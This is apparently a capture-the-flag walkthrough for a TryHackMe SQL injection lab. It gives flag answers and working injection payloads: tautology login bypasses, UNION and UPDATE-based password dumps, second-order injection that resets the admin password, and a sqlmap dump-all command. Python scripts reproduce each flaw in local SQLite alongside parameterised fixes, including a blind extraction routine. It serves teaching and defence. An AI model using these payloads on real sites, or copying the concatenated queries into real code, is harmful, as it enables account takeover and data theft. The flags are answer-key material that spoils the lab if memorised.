Tryhackme-SQL Injection Lab
SQL Injection Lab
Contents
- SQL Injection Lab
- Task1 Introduction
- Task2 Introduction to SQL Injection: Part 1
- Task3 Introduction to SQL Injection: Part 2
- Task4 Vulnerable Startup: Broken Authentication
- Task5 Vulnerable Startup: Broken Authentication 2
- Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
- Task7 Vulnerable Startup: Vulnerable Notes
- Task8 Vulnerable Startup: Change Password
- Task9 Vulnerable Startup: Book Title
- Task10 Vulnerable Startup: Book Title 2
Task1 Introduction
Deploy the machine
Task2 Introduction to SQL Injection: Part 1
1.What is the flag for SQL Injection 1: Input Box Non-String?
THM{dccea429d73d4a6b4f117ac64724f460}
Numeric context, tautology ("universal password") login bypass. The injected `or 1=1` makes the WHERE clause always true and the `--` comments out the password check:
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=1 or 1=1 -- AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
2.What is the flag for SQL Injection 2: Input Box String?
THM{356e9de6016b9ac34e02df99a5f755ba}
String context, tautology login bypass. The leading quote closes the application's string literal first:
SELECT uid,name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or '1'='1' --' AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
3.What is the flag for SQL Injection 3: URL Injection?
THM{645eab5d34f81981f5705de54e8a9c36}
String context, tautology login bypass. The front end blocks special characters, so intercept the request in Burp and send the URL-encoded payload directly:
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='1' or 1=1 --' AND password='6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
4.What is the flag for SQL Injection 4: POST Injection?
THM{727334fd0f0ea1b836a8d443f09dc8eb}
String context, tautology login bypass. The front end blocks special characters, so intercept the request in Burp and write the payload into the POST request body:
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or 1=1--' AND password = '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
Task3 Introduction to SQL Injection: Part 2
What is the flag for SQL Injection 5: UPDATE Statement?
The injectable field is nickName in a profile UPDATE. Because SQLite keeps only the rightmost assignment when a column is set twice, the payload closes the string, assigns nickName a second time from a subquery, and re-opens the string so the rest of the statement still parses. Step 1: dump the table names (usertable and secrets) from sqlite_master:
UPDATE usertable SET nickName='',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='',email='123',password='a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3' WHERE UID='6'
Step 2: dump the CREATE statement of secrets, which reveals the columns id, author and secret:
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
Step 3: dump the rows of secrets, concatenated into the nickname:
',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
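The Task 2 login bypass and the Task 3 UPDATE-statement exfiltration, reproduced locally as an added example (this is not the lab's own code): a SQLite database with the usertable and secrets tables named above, a login built by string concatenation that the tautology payloads defeat, and a profile UPDATE whose nickName field carries a subquery against sqlite_master, next to parameterised versions of both. Column names follow the queries quoted above; the row contents and the sample secret are constructed. The data-extraction payload uses single quotes for the `,` and `:` separators instead of the double quotes shown above, because SQLite's acceptance of double-quoted string literals is a legacy setting that some builds disable.

```python
# Added example, not the lab's code. Re-creates the Task 2 / Task 3 queries in SQLite.
import hashlib
import sqlite3

SCHEMA = """
CREATE TABLE usertable (uid INTEGER PRIMARY KEY, name TEXT, profileID INTEGER,
                        salary INTEGER, passportNr TEXT, email TEXT,
                        nickName TEXT, password TEXT);
CREATE TABLE secrets (id INTEGER PRIMARY KEY, author TEXT, secret TEXT);
"""


def sha256(text: str) -> str:
    # The lab stores SHA-256 hex digests: a665a4... above is sha256("123").
    return hashlib.sha256(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    # Constructed sample rows; the secret is not a real lab flag.
    con.execute("INSERT INTO usertable VALUES (6, 'Alice', 1, 1000, 'P123', "
                "'alice@example.com', 'ali', ?)", (sha256("123"),))
    con.execute("INSERT INTO secrets VALUES (1, 'alice', 'THM{constructed-sample}')")
    con.commit()
    return con


# ---- Task 2: tautology login bypass -----------------------------------------
def login_numeric_vulnerable(con, profile_id: str, password: str):
    """SQL Injection 1 shape: profileID is interpolated unquoted."""
    sql = (f"SELECT uid, name FROM usertable WHERE profileID={profile_id} "
           f"AND password='{sha256(password)}'")
    return con.execute(sql).fetchall()


def login_string_vulnerable(con, profile_id: str, password: str):
    """SQL Injection 2-4 shape: profileID is interpolated inside quotes."""
    sql = (f"SELECT uid, name FROM usertable WHERE profileID='{profile_id}' "
           f"AND password='{sha256(password)}'")
    return con.execute(sql).fetchall()


def login_safe(con, profile_id: str, password: str):
    """Bound parameters: the payload is compared as data, never parsed as SQL."""
    sql = "SELECT uid, name FROM usertable WHERE profileID=? AND password=?"
    return con.execute(sql, (profile_id, sha256(password))).fetchall()


# ---- Task 3: UPDATE-statement injection through the nickName field ----------
def update_profile_vulnerable(con, uid: int, nick: str, email: str, password: str) -> str:
    sql = (f"UPDATE usertable SET nickName='{nick}',email='{email}',"
           f"password='{sha256(password)}' WHERE uid='{uid}'")
    con.execute(sql)
    con.commit()
    # The page later displays the nickname, which is where the subquery result lands.
    return con.execute("SELECT nickName FROM usertable WHERE uid=?", (uid,)).fetchone()[0]


def update_profile_safe(con, uid: int, nick: str, email: str, password: str) -> str:
    con.execute("UPDATE usertable SET nickName=?, email=?, password=? WHERE uid=?",
                (nick, email, sha256(password), uid))
    con.commit()
    return con.execute("SELECT nickName FROM usertable WHERE uid=?", (uid,)).fetchone()[0]


# Payloads typed into the nickName box. Each closes the string, assigns nickName
# a second time (SQLite keeps the rightmost assignment) and re-opens the string
# so the application's own ",email='...'" still parses.
PAYLOAD_TABLES = ("',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master "
                  "WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'),email='")
PAYLOAD_SCHEMA = ("',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' "
                  "AND sql NOT NULL AND name='secrets'),email='")
PAYLOAD_DATA = ("',nickName=(SELECT group_concat(id || ',' || author || ',' || secret "
                "|| ':') FROM secrets),email='")


def enumerate_via_update(con, uid: int = 6) -> dict:
    """Run the three Task 3 steps and collect what the nickname leaks."""
    return {
        "tables": update_profile_vulnerable(con, uid, PAYLOAD_TABLES, "x", "123"),
        "schema": update_profile_vulnerable(con, uid, PAYLOAD_SCHEMA, "x", "123"),
        "data": update_profile_vulnerable(con, uid, PAYLOAD_DATA, "x", "123"),
    }


if __name__ == "__main__":
    db = make_db()
    print(login_numeric_vulnerable(db, "1 or 1=1 --", "wrong"))       # every user
    print(login_string_vulnerable(db, "1' or '1'='1' --", "wrong"))   # every user
    print(login_safe(db, "1' or '1'='1' --", "wrong"))                 # []
    for step, leaked in enumerate_via_update(db).items():
        print(step, "->", leaked)
    print(update_profile_safe(db, 6, PAYLOAD_DATA, "x", "123"))       # stored verbatim
```

Running it prints the user row for both tautology payloads, an empty list for the bound-parameter login, then the table list, the CREATE TABLE text and the concatenated rows of secrets as successive nicknames; the parameterised UPDATE simply stores the payload string as a nickname.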
Task4 Vulnerable Startup: Broken Authentication
What is the flag for this challenge?
THM{f35f47dcd9d596f0d3860d14cd4c68ec}
Tautology login bypass:
1' or 1=1--
Task5 Vulnerable Startup: Broken Authentication 2
What is the flag for this challenge?
THM{fb381dfee71ef9c31b93625ad540c9fa}
Log in with the tautology payload; the top-right corner of the page reflects one of the query's columns (an output position), so a UNION can be used to display data:
' UNION SELECT 1,group_concat(password) FROM users-- -
which dumps the flag.
Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
What is the flag for this challenge?
THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}
Automated with sqlmap against the POST login (-a is --all: retrieve everything once the injection is confirmed):
sqlmap -u http://IP:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite -a
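An added example of the manual technique that sqlmap automates here (this script is not part of the walkthrough and does not talk to the lab): a local SQLite users table stands in for the challenge database, a string-built login that answers only success or failure is the oracle, and the stored password is recovered one character at a time by binary search over the code point returned by unicode(substr(...)). The users table, its columns and the sample password are assumptions.

```python
# Added example, not the lab's code: boolean-based blind extraction against a local stand-in.
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the challenge database; the "flag" is not a real one.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'THM{constructed-sample}')")
    con.commit()
    return con


class BlindOracle:
    """Vulnerable login that leaks nothing but a yes/no answer (redirect vs.
    'invalid credentials'). Counts queries so the cost of the attack is visible."""

    def __init__(self, con: sqlite3.Connection):
        self.con = con
        self.queries = 0

    def login(self, username: str, password: str) -> bool:
        self.queries += 1
        sql = (f"SELECT id FROM users WHERE username='{username}' "
               f"AND password='{password}'")
        return self.con.execute(sql).fetchone() is not None

    def ask(self, condition: str) -> bool:
        # Smuggle one boolean question into the username; the trailing
        # comment discards the application's own password check.
        return self.login(f"admin' AND ({condition})-- -", "x")


def extract(oracle: BlindOracle, column: str, table: str, where: str,
            max_len: int = 64) -> str:
    """Recover (SELECT column FROM table WHERE where) one character at a time."""
    target = f"(SELECT {column} FROM {table} WHERE {where})"
    length = 0
    while length < max_len and oracle.ask(f"length({target}) > {length}"):
        length += 1
    result = ""
    for pos in range(1, length + 1):           # substr() is 1-indexed in SQLite
        lo, hi = 32, 126                        # printable ASCII code points
        while lo < hi:                          # about 7 questions per character
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr({target},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    oracle = BlindOracle(make_db())
    secret = extract(oracle, "password", "users", "username='admin'")
    print(secret, "recovered with", oracle.queries, "requests")
```

The length probe and the per-character bisection are the same two phases sqlmap's boolean-based technique goes through; against a real target each `ask` becomes one HTTP request, which is why blind extraction is slow and noisy in logs.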
Task7 Vulnerable Startup: Vulnerable Notes
What is the flag for this challenge?
THM{4644c7e157fd5498e7e4026c89650814}
Second-order injection. Register an account whose username is
'union select 1,group_concat(password) from users'
The registration itself is safe; the payload is only stored. After logging in, click Notes and the application executes
SELECT title, note FROM notes WHERE username = ''union select 1,group_concat(password) from users''
with the stored username concatenated in, which dumps every password.
Task8 Vulnerable Startup: Change Password
What is the flag for this challenge?
Second-order injection. Register a user named admin'-- - ; after logging in, the change-password function builds its WHERE clause from the stored username, so updating "your own" password updates the admin account's password:
UPDATE users SET password = ? WHERE username = 'admin' -- -'
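The two second-order injections above (Vulnerable Notes and Change Password), reproduced as an added example that is not the challenge's own code: registration stores the username with a bound parameter, so nothing breaks at that point, and the later notes lookup and password change concatenate the stored username back into SQL, in exactly the shape of the two queries quoted above. A parameterised password change is included for contrast. Table layouts and row contents are assumed; the notes table is given a username column because the quoted query filters on one.

```python
# Added example, not the challenge's code: second-order injection in SQLite.
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        CREATE TABLE notes (id INTEGER PRIMARY KEY, username TEXT, title TEXT, note TEXT);
        -- constructed sample rows; not real lab data
        INSERT INTO users VALUES (1, 'admin', 'THM{constructed-sample}');
        INSERT INTO notes VALUES (1, 'admin', 'todo', 'rotate the signing key');
    """)
    return con


def register(con, username: str, password: str) -> None:
    # Parameterised: the hostile username is stored verbatim, harmless for now.
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                (username, password))
    con.commit()


def list_notes_vulnerable(con, session_user: str):
    # Task 7: the username read back for the session is trusted and concatenated.
    sql = f"SELECT title, note FROM notes WHERE username = '{session_user}'"
    return con.execute(sql).fetchall()


def change_password_vulnerable(con, session_user: str, new_password: str) -> None:
    # Task 8: the new password is bound, but the username is concatenated.
    sql = f"UPDATE users SET password = ? WHERE username = '{session_user}'"
    con.execute(sql, (new_password,))
    con.commit()


def change_password_safe(con, session_user: str, new_password: str) -> None:
    con.execute("UPDATE users SET password = ? WHERE username = ?",
                (new_password, session_user))
    con.commit()


def password_of(con, username: str) -> str:
    return con.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()[0]


def attack_notes(con):
    """Task 7: a username that turns the notes query into a UNION."""
    user = "'union select 1,group_concat(password) from users'"   # as in the walkthrough
    register(con, user, "attacker-pw")
    return list_notes_vulnerable(con, user)


def attack_password(con, safe: bool = False) -> str:
    """Task 8: a username that comments out the rest of the UPDATE's WHERE clause."""
    user = "admin'-- -"
    register(con, user, "attacker-pw")
    change = change_password_safe if safe else change_password_vulnerable
    change(con, user, "pwned")
    return password_of(con, "admin")


if __name__ == "__main__":
    db = make_db()
    print(attack_notes(db))                        # admin's password in the note column
    print(attack_password(db))                     # 'pwned': admin was overwritten
    print(attack_password(make_db(), safe=True))   # admin's password unchanged
```

The lesson is that "we validated it on input" is not a defence: the username survives registration unchanged and becomes SQL at a later, unrelated query. Every query that embeds a value has to bind it, whether the value came from the request or from the database.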
Task9 Vulnerable Startup: Book Title
What is the flag for this challenge?
THM{27f8f7ce3c05ca8d6553bc5948a89210}
The search term is embedded in a LIKE '%...%' pattern inside a subquery, so the payload closes the subquery's quote and parenthesis, then UNIONs onto the outer SELECT * (four columns, hence the three fillers):
SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '-1') union select 1,2,3,group_concat(password) from users-- -%')
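An added example (not the challenge app's code) covering the UNION-based extraction of Task 5 and its nested variant in Task 9: the login query exposes one output position, and the book search embeds the term in a LIKE pattern inside a subquery, so the payload has to close the parenthesis before the UNION and match the column count of the outer SELECT *. The column count is found the usual way, by growing UNION SELECT 1,2,... until the database stops raising a column-count error. Tables, columns and rows are assumptions, except that books has four columns, which the 1,2,3,group_concat payload above implies.

```python
# Added example, not the challenge's code: UNION extraction, plain and through a subquery.
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT, author TEXT, year INTEGER);
        -- constructed sample rows; not real lab data
        INSERT INTO users VALUES (1, 'admin', 'THM{constructed-sample}');
        INSERT INTO books VALUES (1, 'The Web Application Hackers Handbook', 'Stuttard', 2011);
    """)
    return con


def login_vulnerable(con, username: str, password: str = "x"):
    # Task 5 shape: two columns; the page prints the second one top-right.
    sql = (f"SELECT id, username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return con.execute(sql).fetchall()


def search_vulnerable(con, term: str):
    # Task 9 shape: the term lands in a LIKE pattern inside a subquery.
    sql = (f"SELECT * FROM books WHERE id = (SELECT id FROM books "
           f"WHERE title LIKE '%{term}%')")
    return con.execute(sql).fetchall()


def search_safe(con, term: str):
    # Bound pattern: '%' and '_' are still wildcards, but the term can no
    # longer leave the string literal.
    sql = "SELECT * FROM books WHERE id = (SELECT id FROM books WHERE title LIKE ?)"
    return con.execute(sql, (f"%{term}%",)).fetchall()


def count_columns(con, query, prefix: str, max_cols: int = 10):
    """Grow UNION SELECT 1,2,... until the column counts match. `prefix` is
    whatever escapes the original context, e.g. "' " or "-1') "."""
    for n in range(1, max_cols + 1):
        nums = ",".join(str(i) for i in range(1, n + 1))
        try:
            query(con, f"{prefix}UNION SELECT {nums}-- -")
            return n
        except sqlite3.OperationalError:   # "...do not have the same number of result columns"
            continue
    return None


def dump_passwords(con, query, prefix: str) -> str:
    """Put group_concat(password) in the last column; the rest are fillers."""
    n = count_columns(con, query, prefix)
    fillers = "".join(f"{i}," for i in range(1, n))
    rows = query(con, f"{prefix}UNION SELECT {fillers}group_concat(password) FROM users-- -")
    return rows[0][-1]


if __name__ == "__main__":
    db = make_db()
    print(count_columns(db, login_vulnerable, "' "))          # 2
    print(dump_passwords(db, login_vulnerable, "' "))
    print(count_columns(db, search_vulnerable, "-1') "))      # 4
    print(dump_passwords(db, search_vulnerable, "-1') "))
    print(search_safe(db, "-1') UNION SELECT 1,2,3,4-- -"))   # []
```

The `-1` in the prefix is only there to make the original subquery match nothing, so the one row that comes back is the attacker's UNION row. Binding the pattern stops the injection; if `%` and `_` in user input matter for the application, escape them as well with an ESCAPE clause, which is a separate concern from injection.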
Task10 Vulnerable Startup: Book Title 2
What is the flag for this challenge?
THM{183526c1843c09809695a9979a672f09}